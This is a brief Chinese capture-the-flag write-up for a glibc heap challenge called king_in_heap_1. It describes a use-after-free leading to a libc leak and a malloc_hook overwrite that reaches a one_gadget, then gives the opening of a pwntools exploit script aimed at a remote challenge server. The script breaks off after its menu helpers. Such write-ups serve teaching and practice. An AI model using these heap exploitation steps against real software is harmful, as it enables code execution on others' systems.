前言:
就, 除了vmpwn都是基础glibc的heap题
king_in_heap_1:
delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('47.104.175.110',20066)
#sh=process('./king')
elf=ELF('./king')
libc=elf.libc
context.binary=elf
#context.log_level='debug'
def magic():
sh.recvuntil(">> \n")
sh.sendline("666")
def add(idx, size):
sh.recv()
sh.sendline('1')
sh.recv()
sh.sendline(str(idx))
sh.recv()
sh.sendline(str(size))
def delete(idx):
sh.recv()
sh.sendline('2')
sh.recv()
sh.sendline(str(idx))
def edit(idx, content):
sh.recv()
sh.sendline("3")
sh.recv()
sh.sendline(str(idx))
sh.recv()
sh.sendline(content)
def exp():
magic()